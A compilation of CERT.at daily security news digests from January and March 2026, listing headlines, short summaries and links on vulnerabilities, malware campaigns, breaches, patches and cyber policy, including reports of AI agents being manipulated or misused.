Security updates have been issued by Debian (pdfminer and vlc), Red Hat (kernel, kernel-rt, and microcode_ctl), Slackware (libtasn1), SUSE (apptainer, curl, ImageMagick, libpcap, libvirt, libwget4, php8, podman, python311-cbor2, qemu, and rsync), and Ubuntu (gnupg, gnupg2, gpsd, libsodium, and python-tornado).

https://lwn.net/Articles/1053492/

Hitachi Energy Asset Suite

Hitachi Energy is aware of a Jasper Report vulnerability that affects the Asset Suite product versions mentioned in this document below. This vulnerability can be exploited to carry out remote code execution (RCE) attack on the product. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation.

https://www.cisa.gov/news-events/ics-advisories/icsa-26-008-01

K000159018: Linux kernel vulnerability CVE-2023-53178

A local unprivileged user may exploit this vulnerability and cause data integrity issues or system instability under specific conditions.

https://my.f5.com/manage/s/article/K000159018

Tageszusammenfassung - 08.01.2026

2026-01-08T19:11:30Z

End-of-Day report

Timeframe: Mittwoch 07-01-2026 18:00 - Donnerstag 08-01-2026 18:00 Handler: Felician Fuchs Co-Handler: n/a

News

New GoBruteforcer attack wave targets crypto, blockchain projects

A new wave of GoBruteforcer botnet malware attacks is targeting databases of cryptocurrency and blockchain projects on exposed servers believed to be configured using AI-generated examples.

https://www.bleepingcomputer.com/news/security/new-gobruteforcer-attack-wave-targets-crypto-blockchain-projects/

Cisco warns of Identity Service Engine flaw with exploit code

Cisco has patched an ISE vulnerability with public proof-of-concept exploit code that can be abused by attackers with admin privileges.

https://www.bleepingcomputer.com/news/security/cisco-warns-of-identity-service-engine-flaw-with-exploit-code/

Dringend MFA aktivieren: Massenhaft Daten aus Cloud-Instanzen abgeflossen

Betroffen sind self-hosted Instanzen von Owncloud, Nextcloud und Sharefile. Daten von 50 Organisationen stehen zum Verkauf, weil die MFA nicht aktiv war.

https://www.golem.de/news/dringend-mfa-aktivieren-massenhaft-daten-aus-cloud-instanzen-abgeflossen-2601-203932.html

NIS-2-Umsetzung: BSI schaltet Meldeportal auf Amazon-Servern frei

Fast 30.000 Firmen und Behörden der kritischen Infrastruktur müssen sich beim BSI registrieren. Das Portal läuft auf Clouddiensten von AWS.

https://www.golem.de/news/nis-2-umsetzung-bsi-schaltet-meldeportal-auf-amazon-servern-frei-2601-203957.html

BSI warnt: 40 Prozent der deutschen Zimbra-Server sind angreifbar

Ein Großteil aller Zimbra-Server in Deutschland basiert noch auf einer veralteten Version, die anfällig für gefährliche Sicherheitslücken ist.

https://www.golem.de/news/bsi-warnt-40-prozent-der-deutschen-zimbra-server-sind-angreifbar-2601-203959.html

Fake Browser Updates Targeting WordPress Administrators via Malicious Plugin

We recently investigated a case involving a WordPress website where a customer reported persistent fake pop-up notifications appearing on their site. The warnings were urging them to update their browser (Chrome or Firefox), even though their software was already fully up-to-date.

https://blog.sucuri.net/2026/01/fake-browser-updates-targeting-wordpress-administrators-via-malicious-plugin.html

CISA Flags Microsoft Office and HPE OneView Bugs as Actively Exploited

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added two security flaws impacting Microsoft Office and Hewlett Packard Enterprise (HPE) OneView to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.

https://thehackernews.com/2026/01/cisa-flags-microsoft-office-and-hpe.html

Researchers Uncover NodeCordRAT Hidden in npm Bitcoin-Themed Packages

Cybersecurity researchers have discovered three malicious npm packages that are designed to deliver a previously undocumented malware called NodeCordRAT.

https://thehackernews.com/2026/01/researchers-uncover-nodecordrat-hidden.html

IBMs AI agent Bob easily duped to run malware, researchers show

Prompt injection lets risky commands slip past guardrails IBM describes its coding agent thus: "Bob is your AI software development partner that understands your intent, repo, and security standards." Unfortunately, Bob doesnt always follow those security standards.

https://www.theregister.com/2026/01/07/ibm_bob_vulnerability/

Gemeinsam gegen Cyber-Kriminalität: Info-Offensive zum ESC-Ticketkauf

Vor dem Start der ersten Ticket-Verkaufswelle am 13. Jänner sensibilisieren ORF, EBU, BMI, Stadt Wien, Polizei und -Watchlist Internet- für Cyber-Gefahren und richten eine zentrale Meldestelle für Betrugsversuche ein.

https://www.watchlist-internet.at/news/gemeinsam-gegen-cyber-kriminalitaet-info-offensive-zum-esc-ticketkauf/

Stalkerware operator pleads guilty in rare prosecution

The owner of a Michigan-based stalkerware company pleaded guilty to federal charges for selling a product designed to spy on people without their consent.

https://therecord.media/stalkerware-guilty-plea-fleming

Fake ChatGPT and DeepSeek Extensions Spied on Over 1 Million Chrome Users

Security researchers have identified two malicious Chrome extensions recording AI chats. Learn how to identify and remove these tools to protect your privacy.

https://hackread.com/fake-chatgpt-deepseek-extensions-spy-chrome-users/

Discord Controlled NodeCordRAT Steals Chrome Data via NPM Packages

Zscaler ThreatLabz identifies three malicious NPM packages mimicking Bitcoin libraries. The NodeCordRAT virus uses Discord commands to exfiltrate MetaMask data and Chrome passwords.

https://hackread.com/discord-nodecordrat-steal-chrome-data-npm-packages/

The Ransomware Ground Game: How A Christmas Scanning Campaign Will Fuel 2026 Attacks

Over four days in December, one operator scanned the internet with 240+ exploits, logging confirmed vulnerabilities that could power targeted intrusions in 2026.

https://www.greynoise.io/blog/christmas-scanning-campaign-fuel-2026-attacks

Decoding the GitHub recommendations for npm maintainers

This blog post explores the rationale and implementation behind GitHubs security recommendations for npm maintainers following numerous high-profile supply-chain incidents. It details how hardening publishing infrastructure through trusted publishing, enforced two-factor authentication, and WebAuthn-based protocols can meaningfully increase the resilience of the ecosystem.

https://securitylabs.datadoghq.com/articles/decoding-the-recommendations-for-npm-maintainers/

Abusing ROPC to Bypass MFA - and How I Built a Detection for It in Microsoft Sentinel

Among all the OAuth2 grant types available in Azure AD (now Microsoft Entra ID), the Resource Owner Password Credential (ROPC) flow remains one of the most misunderstood - and most abused.

https://detect.fyi/abusing-ropc-to-bypass-mfa-and-how-i-built-a-detection-for-it-in-microsoft-sentinel-135e46aeb7c9

Preparing for Post-Quantum Cryptography

Learn what you can do today to prepare for Q-Day.

https://www.wiz.io/blog/preparing-for-post-quantum-cryptography

npm to Implement Staged Publishing After Turbulent Shift Off Classic Tokens

The JavaScript ecosystem spent much of 2025 responding to a sustained run of supply chain attacks, but it was the multi-wave Shai-Hulud campaign that ultimately reset expectations for what large-scale, automated compromise looks like. By the end of the year, organizations with JavaScript-heavy infrastructure were no longer treating supply chain malware as an edge case, but as an operational risk that could spread faster than human review. Now, npm says it is preparing its next major response.

https://socket.dev/blog/npm-to-implement-staged-publishing

Crimson Collective Claims to Disconnect Brightspeed Internet Users After Hack

The hacking group Crimson Collective claims to have access to Brightspeed-s infrastructure and is disconnecting users from the company-s home internet services. The group made its latest claims in a post on Telegram yesterday. -Hey BrightSpeed, we disconnected alot of your users home internet.. they might be complaining you should check,- the Telegram post says.

https://thecyberexpress.com/crimson-collective-disconnects-brightspeed/

Trump Orders US Exit from Global Cyber and Hybrid Threat Coalitions

President Donald Trump has ordered the immediate withdrawal of the United States from several premier international bodies dedicated to cybersecurity, digital human rights, and countering hybrid warfare, as part of a major restructuring of American defense and diplomatic posture.

https://thecyberexpress.com/trump-orders-us-exit-from-cyber-coalitions/

UK Moves to Close Public Sector Cyber Gaps With Government Cyber Action Plan

The UK government has revealed the Government Cyber Action Plan as a renewed effort to close the growing gap between escalating cyber threats and the public sector-s ability to respond effectively. The move comes amid a series of cyberattacks targeting UK retail and manufacturing sectors, incidents that have underscored broader vulnerabilities affecting critical services and government operations.

https://thecyberexpress.com/uk-government-cyber-action-plan/

Vulnerabilities

Max severity Ni8mare flaw lets hackers hijack n8n servers

A maximum severity vulnerability dubbed "Ni8mare" allows remote, unauthenticated attackers to take control over locally deployed instances of the N8N workflow automation platform.

https://www.bleepingcomputer.com/news/security/max-severity-ni8mare-flaw-lets-hackers-hijack-n8n-servers/

Critical jsPDF flaw lets hackers steal secrets via generated PDFs

The jsPDF library for generating PDF documents in JavaScript applications is vulnerable to a critical vulnerability that allows an attacker to steal sensitive data from the local filesystem by including it in generated files.

https://www.bleepingcomputer.com/news/security/critical-jspdf-flaw-lets-hackers-steal-secrets-via-generated-pdfs/

The installers for multiple PIONEER products may insecurely load Dynamic Link Libraries

The installers for multiple products provided by PIONEER CORPORATION may insecurely load Dynamic Link Libraries. Arbitrary code may be executed with the privileges of the running installer.

https://jvn.jp/en/jp/JVN17956874/

zlib: Kritische Sicherheitslücke ermöglicht Codeschmuggel - noch kein Update

In einem Werkzeug der Kompressionsbibliothek zlib, die in zahlreichen Programmen und Betriebssystemen enthalten ist, haben IT-Forscher eine kritische Sicherheitslücke entdeckt. Sie ermöglicht unter Umständen das Einschleusen und Ausführen von Schadcode. Ein Update zum Stopfen des Sicherheitslecks gibt es bislang noch nicht.

https://www.heise.de/news/zlib-Kritische-Sicherheitsluecke-ermoeglicht-Codeschmuggel-noch-kein-Update-11133774.html

Sieben kritische Sicherheitslücken mit Höchstwertung bedrohen Coolify

Admins von Platform-as-a-Service-Umgebungen auf der Basis von Coolify sollten ihre Instanzen zügig auf den aktuellen Stand bringen. Geschieht das nicht, können Angreifer unter anderem an sieben -kritischen- Sicherheitslücken mit Höchstwertung (CVSS Score 10 von 10) ansetzen, um Server vollständig zu kompromittieren.

https://www.heise.de/news/Sieben-kritische-Sicherheitsluecken-mit-Hoechstwertung-bedrohen-Coolify-11134510.html

Kanboard-Sicherheitslücke ermöglicht Anmeldung als beliebiger User

Das Open-Source-Kanban Kanboard ist von drei Schwachstellen betroffen. Eine davon gilt den Entwicklern als kritisches Risiko und ermöglicht die Anmeldung als beliebiger User - sofern eine bestimmte Konfigurationsoption gesetzt ist.

https://www.heise.de/news/Kanboard-Sicherheitsluecke-ermoeglicht-Anmeldung-als-beliebiger-User-11134247.html

Security updates for Thursday

Security updates have been issued by AlmaLinux (gcc-toolset-14-binutils, gcc-toolset-15-binutils, httpd, kernel, libpng, mariadb, mingw-libpng, poppler, python3.12, and ruby:3.3), Debian (foomuuri and libsodium), Fedora (python-pdfminer and wget2), Oracle (audiofile, bind, gcc-toolset-15-binutils, libpng, mariadb, mariadb10.11, mariadb:10.11, mariadb:10.5, mingw-libpng, poppler, and python3.12), Red Hat (git-lfs, kernel, libpng, libpq, mariadb:10.3, osbuild-composer, postgresql, postgresql:13, and postgresql:15), Slackware (curl), SUSE (c-ares-devel, capstone, curl, gpsd, ImageMagick, libpcap, log4j, python311-filelock, and python314), and Ubuntu (libcaca, libxslt, and net-snmp).

https://lwn.net/Articles/1053277/

[R1] Nessus Agent Versions 11.0.3 and 10.9.3 Fix One Vulnerability

A vulnerability has been identified in the installation/uninstallation of the Nessus Agent Tray App on Windows Hosts which could lead to escalation of privileges. Tenable has released Nessus Agent 11.0.3 and Nessus Agent 10.9.3 to address these issues.

https://www.tenable.com/security/tns-2026-01

CVE-2025-42877: Memory Corruption in SAP Web Dispatcher

SAP Web Dispatcher and Internet Communication Manager (ICM) contain a critical memory corruption vulnerability in the HTTP header parsing function. The vulnerability allows an unauthenticated attacker to cause heap corruption and lead to Denial of Service through specially crafted HTTP requests.

https://redrays.io/blog/cve-2025-42877-sap-web-dispatcher-memory-corruption-analysis/

Case opened: DIVD-2025-00011 - Severe vulnerabilities in Growatt portal

https://csirt.divd.nl/cases/DIVD-2025-00011/

Tageszusammenfassung - 07.01.2026

2026-01-07T18:14:42Z

End-of-Day report

Timeframe: Montag 05-01-2026 18:00 - Mittwoch 07-01-2026 18:00 Handler: Alexander Riepl Co-Handler: n/a

News

New D-Link flaw in legacy DSL routers actively exploited in attacks

Threat actors are exploiting a recently discovered command injection vulnerability that affects multiple D-Link DSL gateway routers that went out of support years ago.

https://www.bleepingcomputer.com/news/security/new-d-link-flaw-in-legacy-dsl-routers-actively-exploited-in-attacks/

ownCloud urges users to enable MFA after credential theft reports

File-sharing platform ownCloud warned users today to enable multi-factor authentication (MFA) to block attackers using compromised credentials from stealing their data.

https://www.bleepingcomputer.com/news/security/owncloud-urges-users-to-enable-mfa-after-credential-theft-reports/

Microsoft: Classic Outlook bug prevents opening encrypted emails

Microsoft has confirmed a known issue that prevents recipients from opening encrypted emails in classic Outlook.

https://www.bleepingcomputer.com/news/microsoft/microsoft-classic-outlook-bug-prevents-opening-encrypted-emails/

Founder of Spyware Maker PcTattletale Pleads Guilty To Hacking, Advertising Surveillance Software

An anonymous reader quotes a report from TechCrunch: The founder of a U.S.-based spyware company, whose surveillance products allowed customers to spy on the phones and computers of unsuspecting victims, pleaded guilty to federal charges linked to his long-running operation. pcTattletale founder Bryan Fleming entered a guilty plea in a San Diego federal ..

https://yro.slashdot.org/story/26/01/07/0033238/founder-of-spyware-maker-pctattletale-pleads-guilty-to-hacking-advertising-surveillance-software

UK injects just £210M into cyber plan to stop Whitehall getting pwnd

Central government will supposedly be as secure as energy facilities and datacenters under new proposals The UK today launches its Government Cyber Action Plan, committing £210 million ($282 million) to strengthen defenses across digital public services and hold itself to the same cybersecurity standards its imposing on critical infrastructure operators.

https://www.theregister.com/2026/01/06/government_cyber_action_plan/

Malicious NPM Packages Deliver NodeCordRAT

Zscaler ThreatLabz regularly monitors the npm database for suspicious packages. In November 2025, ThreatLabz identified three malicious packages: bitcoin-main-lib, bitcoin-lib-js, and bip40. The bitcoin-main-lib and bitcoin-lib-js packages execute a postinstall.cjs script during installation, which installs bip40, the package that contains the ..

https://www.zscaler.com/blogs/security-research/malicious-npm-packages-deliver-nodecordrat

CISA-Katalog attackierter Schwachstellen wuchs 2025 um 20 Prozent

Die US-amerikanische IT-Sicherheitsbehörde CISA pflegt einen Katalog angegriffener Schwachstellen. Der wuchs 2025 etwas schneller.

https://www.heise.de/news/CISA-Katalog-attackierter-Schwachstellen-wuchs-2025-um-20-Prozent-11130460.html

Patchday: Dolby-Digital-Sicherheitslücke in Android geschlossen

Androidgeräte sind für eine Zero-Click-Attacke anfällig. Dieses Sicherheitsproblem wurde nun gelöst.

https://www.heise.de/news/Patchday-Dolby-Digital-Sicherheitsluecke-in-Android-geschlossen-11130450.html

Ubiquiti UniFi Protect: Sicherheitslücke ermöglicht Zugriff auf Kameras

In der UniFi Protect Application können Angreifer Schwachstellen für unbefugten Zugriff auf Kameras und DoS-Attacken missbrauchen.

https://www.heise.de/news/Ubiquiti-UniFi-Protect-Sicherheitsluecke-ermoeglicht-Zugriff-auf-Kameras-11131097.html

Mehrere Sicherheitslücken bedrohen Veeam Back & Replication

Ein wichtiges Sicherheitsupdate schließt mehrere Schwachstellen in Veeam Back & Replication. Bislang sind keine Attacken bekannt.

https://www.heise.de/news/Mehrere-Sicherheitsluecken-bedrohen-Veeam-Back-Replication-11132196.html

Krypto-Phishing mit angeblicher Mail des Bundeszentralamts für Steuern

Eine aktuelle Phishing-Welle behauptet Abweichungen bei -Krypto-Angaben- beim Bundeszentralamt für Steuern.

https://www.heise.de/news/Krypto-Phishing-mit-angeblicher-Mail-des-Bundeszentralamts-fuer-Steuern-11132880.html

2025, the year of the Infostealer

TL;DR Introduction Infostealers are not new malware. They have been around for decades. What has changed is how effective they have become, and how easily they blend into normal user behaviour. In 2025, infostealers became the fastest growing malware category, overtaking ransomware in terms of deployment and spread. The H1 2025 reports highlighted a sharp rise in simple ..

https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/

Russian hackers target European hospitality industry with -blue screen of death- malware

The scheme starts with a fake reservation cancellation that impersonates a popular booking site, and eventually prompts victims with an error message and -Blue Screen of Death- page.

https://therecord.media/russian-hackers-europe-hospitality-blue-screen

Alleged cyber scam kingpin arrested, extradited to China

Chen Zhi-s arrest is the latest chapter in the remarkable downfall of one of the country-s most prominent businesses, with holdings in the real estate, banking, entertainment and airline industries.

https://therecord.media/alleged-cyber-scam-kingpin-cambodia-arrested-extradited

Analysis of a Fake Cloudflare Turnstile Used as a Traffic Filtering Gate

During analysis of a phishing URL chain, I observed a fake Cloudflare Turnstile verification page acting as an intelligent traffic filtering gate. Rather than protecting a website, this page selectively blocks, redirects, or allows access based on geolocation, proxy usage, and browser fingerprinting. This phishing infrastructure demonstrates Traffic Distribution System like behavior ..

https://malwr-analysis.com/2026/01/07/analysis-of-a-fake-cloudflare-turnstile-used-as-a-traffic-filtering-gate/

Vulnerabilities

Cisco Identity Services Engine XML External Entity Processing Information Disclosure Vulnerability

A vulnerability in the licensing features of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker with administrative privileges to gain access to sensitive information. This vulnerability is due to improper parsing of XML that is processed by the web-based management interface of Cisco ISE and Cisco ISE-PIC. An attacker could exploit this vulnerability by uploading a malicious file to ..

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-xxe-jWSbSDKt

Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities

Multiple Cisco products are affected by vulnerabilities in the processing of Distributed Computing Environment Remote Procedure Call (DCE/RPC) requests that could allow an unauthenticated, remote attacker to cause the Snort 3 Detection Engine to leak sensitive information or to restart, which would result in an interruption of packet inspection. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address ..

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snort3-dcerpc-vulns-J9HNF4tH

[20260101] - Core - Inadequate content filtering for data URLs

https://developer.joomla.org/security-centre/1016-20260101-core-inadequate-content-filtering-for-data-urls.html

[20260102] - Core - XSS vector in the pagebreak plugin

https://developer.joomla.org/security-centre/1017-20260102-core-xss-vector-in-the-pagebreak-plugin.html

[20260102] - Core - XSS vectors in the pagebreak and pagenavigation plugins

https://developer.joomla.org/security-centre/1017-20260102-core-xss-vector-in-the-pagebreak-plugin.html

Tageszusammenfassung - 05.01.2026

2026-01-05T18:06:37Z

End-of-Day report

Timeframe: Freitag 02-01-2026 18:00 - Montag 05-01-2026 18:00 Handler: Alexander Riepl Co-Handler: n/a

News

Hackers claim to hack Resecurity, firm says it was a honeypot

The ShinyHunters hacking group claims it breached the systems of cybersecurity firm Resecurity and stole internal data, while Resecurity says the attackers only accessed a deliberately deployed honeypot containing fake information used to monitor their activity.

https://www.bleepingcomputer.com/news/security/hackers-claim-resecurity-hack-firm-says-it-was-a-honeypot/

How to Protect Your iPhone or Android Device From Spyware

Being targeted by sophisticated spyware is relatively rare, but experts say that everyone needs to stay vigilant as this dangerous malware continues to proliferate worldwide.

https://www.wired.com/story/how-to-protect-your-iphone-or-android-device-from-spyware/

Plex Media Server: Noch ungepatchte Zugriffsschwachstellen

Im Plex Media Server klaffen Sicherheitslecks, durch die Angreifer sich unbefugt Zugriff verschaffen können. Updates stehen aus.

https://www.heise.de/news/Plex-Media-Server-Noch-ungepatchte-Zugriffsschwachstellen-11128582.html

MongoBleed-Scanner für Admins

Viele MongoDB-Instanzen sind oder waren potenziell für MongoBleed anfällig. Ein Tool hilft bei der Server-Analyse auf Angriffsspuren.

https://www.heise.de/news/MongoBleed-Scanner-fuer-Admins-11129291.html

Taiwan: 2,6 Millionen Cyberangriffe Chinas pro Tag

Die Angriffe haben laut Taiwan in zeitlicher Nähe zu Militärübungen stattgefunden. China dementiert

https://www.derstandard.at/story/3000000302832/taiwan-26-millionen-cyberangriffe-chinas-pro-tag

Aktuelle Angriffe gegen alte Sicherheitslücke in Fortinet-Geräten (CVE-2020-12812)

Eine bereits seit Juli 2020 bekannte Sicherheitslücke in Fortinet-Firewalls, CVE-2020-12812, wird aktuell aktiv ausgenutzt. Durch Ausnutzung der Schwachstelle können Angreifer:innen durch eine simple Manipulation von Groß- und Kleinbuchstaben in Benutzernamen (z. B. "Mmueller" statt "mmueller") die Zwei-Faktor-Authentifizierung (2FA) über Fortitoken umgehen. Besonders gefährdet sind Systeme, die lokale Nutzer:innen über einen ..

https://www.cert.at/de/aktuelles/2026/1/aktuelle-angriffe-gegen-alte-sicherheitslucke-in-fortinet-geraten-cve-2020-12812

Nearly 480,000 impacted by Covenant Health data breach

A cyberattack last year against the Catholic healthcare organization Covenant Health exposed the sensitive information of more than 478,000 people.

https://therecord.media/covenant-health-breach-qilin

NordVPN Denies Breach After Hacker Claims Access to Salesforce Dev Data

A hacker using the alias 1011 has claimed to breach a NordVPN development server, posting what appears to-

https://hackread.com/nordvpn-denies-breach-hacker-salesforce-dev-data/

Schlappe für Softwarebauer: BSI darf Sicherheitskonzept als -auffällig- rügen

Das Verwaltungsgericht Köln hat den Eilantrag eines Herstellers gegen eine drohende behördliche Warnung abgewiesen und die BSI-Informationsbefugnisse gestärkt.

https://heise.de/-11127661

Sicherheitsupdates: Verschiedene Attacken auf Qnap-NAS möglich

Stimmten die Voraussetzungen, können Angreifer Netzwerkspeicher von Qnap mit weitreichenden Folgen attackieren.

https://heise.de/-11129647

The Kimwolf Botnet is Stalking Your Local Network

The story you are reading is a series of scoops nestled inside a far more urgent Internet-wide security advisory. The vulnerability at issue has been exploited for months already, and it-s time for a broader awareness of the threat. The short version is that everything you thought you knew about the security of the internal network behind your Internet router probably is now dangerously out of date.

https://krebsonsecurity.com/2026/01/the-kimwolf-botnet-is-stalking-your-local-network/

Vulnerabilities

Security updates for Monday

Security updates have been issued by AlmaLinux (tar), Debian (curl and gimp), Fedora (doctl, gitleaks, gnupg2, grpcurl, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, and usd), Mageia (cups), Red Hat (container-tools:rhel8, go-toolset:rhel8, grafana, and skopeo), and SUSE (dirmngr, fluidsynth, gnu-recutils, libmatio-devel, python311-marshmallow, python312-Django6, rsync, and thunderbird).

https://lwn.net/Articles/1052795/

Tageszusammenfassung - 02.01.2026

2026-01-02T18:22:02Z

End-of-Day report

Timeframe: Dienstag 30-12-2025 18:00 - Freitag 02-01-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: Alexander Riepl

News

Over 10K Fortinet firewalls exposed to actively exploited 2FA bypass

Fortinet released FortiOS versions 6.4.1, 6.2.4, and 6.0.10 in July 2020 to address this flaw (tracked as CVE-2020-12812) and advised admins who couldn't immediately patch to turn off username-case-sensitivity to block 2FA bypass attempts targeting their devices. [..] On Friday, Internet security watchdog Shadowserver revealed that it currently tracks over 10,000 Fortinet firewalls still exposed on the Internet that are unpatched against CVE-2020-12812 and vulnerable to these ongoing attacks ...

https://www.bleepingcomputer.com/news/security/over-10-000-fortinet-firewalls-exposed-to-ongoing-2fa-bypass-attacks/

The Kimwolf Botnet is Stalking Your Local Network

The story you are reading is a series of scoops nestled inside a far more urgent Internet-wide security advisory. The vulnerability at issue has been exploited for months already, and its time for a broader awareness of the threat. The short version is that everything you thought you knew about the security of the internal network behind your Internet router probably is now dangerously out of date.

https://krebsonsecurity.com/2026/01/the-kimwolf-botnet-is-stalking-your-local-network/

Everest Ransomware Leaks 1TB of Stolen ASUS Data

On December 2, 2025, Hackread.com exclusively reported that the Everest ransomware group claimed to have stolen 1TB of sensitive ASUS data, including information related to the company-s AI models, memory dumps, and calibration files. [..] Everest has now leaked the entire dataset online.

https://hackread.com/everest-ransomware-asus-data-leak/

RondoDox botnet exploits React2Shell flaw to breach Next.js servers

The RondoDox botnet has been observed exploiting the critical React2Shell flaw (CVE-2025-55182) to infect vulnerable Next.js servers with malware and cryptominers.

https://www.bleepingcomputer.com/news/security/rondodox-botnet-exploits-react2shell-flaw-to-breach-nextjs-servers/

The biggest cybersecurity and cyberattack stories of 2025

2025 was a big year for cybersecurity, with cyberattacks, data breaches, threat groups reaching new notoriety levels, and, of course, zero-day flaws exploited in breaches. Some stories, though, were more impactful or popular with our readers than others. This article explores 15 of the biggest cybersecurity stories of 2025.

https://www.bleepingcomputer.com/news/security/the-biggest-cybersecurity-and-cyberattack-stories-of-2025/

Hong Kong-s newest anti-scam technology is over-the-counter banking

Hong Kong-s banks have a new weapon against scams: Accounts that require customers to visit a branch to access their funds.

https://go.theregister.com/feed/www.theregister.com/2025/12/31/hong_kong_antiscam_money_safe/

How AI made scams more convincing in 2025

Several AI-related stories in 2025 highlighted how quickly AI systems can move beyond meaningful human control.

https://www.malwarebytes.com/blog/news/2026/01/how-ai-made-scams-more-convincing-in-2025

VVS Discord Stealer Using Pyarmor for Obfuscation and Detection Evasion

Discord is a social messaging and communications platform that has become a popular target for malware, like VVS stealer. VVS stealer is designed to steal a victim's Discord information and browser data. [..] The stealer also achieves persistence by automatically installing itself on startup. It operates stealthily by displaying fake error messages and capturing screenshots.

https://unit42.paloaltonetworks.com/vvs-stealer/

Snipping the Long Tail of Shai-Hulud 2.0

Wiz Research reveals the data behind Shai-Huluds 2.0 long tail, the massive gap in cloud credential rotation, a potential link to the Trust Wallet incident, and how we finally "snipped the tail" on a month of ongoing infections.

https://www.wiz.io/blog/snipping-the-long-tail-of-shai-hulud-2-0

RMM Abuse in a Crypto Wallet Distribution Campaign

A professionally written announcement email titled -Eternl Desktop Is Live - Secure Execution for Atrium & Diffusion Participants- is currently circulating within the Cardano community. [..] This campaign exhibits multiple overlapping indicators consistent with supply-chain abuse and trojanized wallet distribution, combined with pre positioning techniques that leverage RMM tools to establish persistent access.

https://malwr-analysis.com/2025/12/31/rmm-abuse-in-a-crypto-wallet-distribution-campaign/

Vulnerabilities

Gambio: Wichtiges Security Update 2025-12 v1.0.0 für alle Versionen bis GX5 v5.0.1.0

Wir haben soeben ein neues Security Update Paket veröffentlicht, dessen Installation wir allen Shopbetreibern dringend empfehlen. Wichtig: Nutzer der Gambio Cloud müssen nichts unternehmen, alle Shops wurden bereits vollständig von uns abgesichert! [..] Bitte versteht, dass wir keine Details beschreiben werden, die Angreifern als Blaupause für einen Angriff dienen könnten.

https://www.gambio.de/forum/threads/wichtiges-security-update-2025-12-v1-0-0-fuer-alle-versionen-bis-gx5-v5-0-1-0.52593/

QNAP Security Advisories 3. Jan

QNAP has released 7 new security advisories.

https://www.qnap.com/en-us/security-advisories

Security updates for Friday

Security updates have been issued by Debian (smb4k), Fedora (direwolf, gh, usd, and webkitgtk), Slackware (libpcap and seamonkey), and SUSE (kepler).

https://lwn.net/Articles/1052600/

CERT.at - Tagesberichte

Tageszusammenfassung - 13.03.2026

End-of-Day report

News

Investigating a New Click-Fix Variant

Rogue AI agents can work together to hack systems and steal secrets

A React-based phishing page with credential exfiltration via EmailJS, (Fri, Mar 13th)

Hive0163 Uses AI-Assisted Slopoly Malware for Persistent Access in Ransomware Attacks

Ivanti EPMM -Sleeper Shells- not so sleepy?

-Handala Hack- - Unveiling Group-s Modus Operandi

6 Malicious Packagist Themes Ship Trojanized jQuery and FUNNULL Redirect Payloads

Vulnerabilities

Mehrere Sicherheitslücken in AppArmor ("CrackArmor") - Updates verfügbar

Veeam warns of critical flaws exposing backup servers to RCE attacks

Chrome-Notfallupdate: Zwei attackierte Codeschmuggel-Lücken gestopft

Veeam Backup & Replication: Kritische Schadcode-Sicherheitslücken entdeckt

LWN Security updates for Friday

Tageszusammenfassung - 12.03.2026

End-of-Day report

News

New PhantomRaven NPM attack wave steals dev data via 88 packages

US disrupts SocksEscort proxy network powered by Linux malware

Vollzugriff in zwei Stunden: KI-Agent hackt eigenständig KI-Plattform von McKinsey

When your IoT Device Logs in as Admin, It?s too Late!

Researchers Trick Perplexitys Comet AI Browser Into Phishing Scam in Under Four Minutes

Six Android Malware Families Target Pix Payments, Banking Apps, and Crypto Wallets

Exploitkit-Gefahr: Apple aktualisiert ältere iOS- und iPadOS-Versionen

Taming the dragon: reverse engineering firmware with Ghidra

Abo-Falle auf der Handyrechnung: So reagieren Sie richtig

Internationales Cybercrime-Netz zerschlagen, 700 Opfer in Österreich

Announcing Pwn2Own Berlin for 2026

A Nerds Life: Weeks of Firmware Teardown to Prove We Were Right

InTune Compromise Allows Attackers to Remotely Wipe Medical Supply Company Devices

Vulnerabilities

SQLi flaw in Elementor Ally plugin impacts 250k+ WordPress sites

Zero Click Unauthenticated RCE in n8n: A Contact Form That Executes Shell Commands

Aruba-Switches mit AOS-CX: Angreifer können Admin-Passwort zurücksetzen

HP-PCs: Angreifer können sich höhere Rechte über UEFI-Lücken verschaffen

Zoom: Netzwerkangriffe auf kritische Sicherheitslücke möglich

LWN Security updates for Thursday

Tageszusammenfassung - 11.03.2026

End-of-Day report

News

Analyzing "Zombie Zip" Files (CVE-2026-0866), (Wed, Mar 11th)

Claude Tried to Hack 30 Companies. Nobody Asked It To.

Sextortion -I recorded you- emails reuse passwords found in disposable inboxes

Bitpanda-Falle: Warnung vor unautorisiertem Wallet-Transfer ist ein Phishing-Versuch!

Sednit reloaded: Back in the trenches

BlackSanta Malware Targets HR Staff with Fake CV Downloads

RondoDox Botnet: From Zero to 174 Exploited Vulnerabilities

Microsoft releases Windows 10 KB5078885 extended security update

Vulnerabilities

Microsoft Patch Tuesday for March 2026 - Snort rules and prominent vulnerabilities

HPE warns of critical AOS-CX flaw allowing admin password resets

Adobe-Patchday: Schadcodeschmuggel in Reader, Illustrator und weiteren möglich

Passwort-Manager KeePassXC 2.7.12: Was Nutzer beim Update beachten müssen

Fortinet schließt Brute-Force- und Befehlsschmuggel-Lücken in FortiWeb & Co.

Drupal: Unpublished Node Permissions - Critical - Access bypass - SA-CONTRIB-2026-029

Drupal: AI (Artificial Intelligence) - Moderately critical - Information Disclosure - SA-CONTRIB-2026-028

Cisco: Cisco IOS XR Egress Packet Network Interface Aligner Interrupt Denial of Service Vulnerability

Cisco: Cisco Multiple Cisco Contact Center Products Cross-Site Scripting Vulnerabilities

Cisco: Cisco IOS XR Software CLI Privilege Escalation Vulnerabilities

Cisco: Cisco IOS XR Software Multi-Instance Intermediate System-to-Intermediate System Denial of Service Vulnerability

Splunk: Security Advisories 2026-03-11

WordPress 6.9.4 Release

LWN: Security updates for Wednesday

Paloalto: CVE-2026-0230 Cortex XDR Agent: Local Administrator can disable the agent on macOS (Severity: MEDIUM)

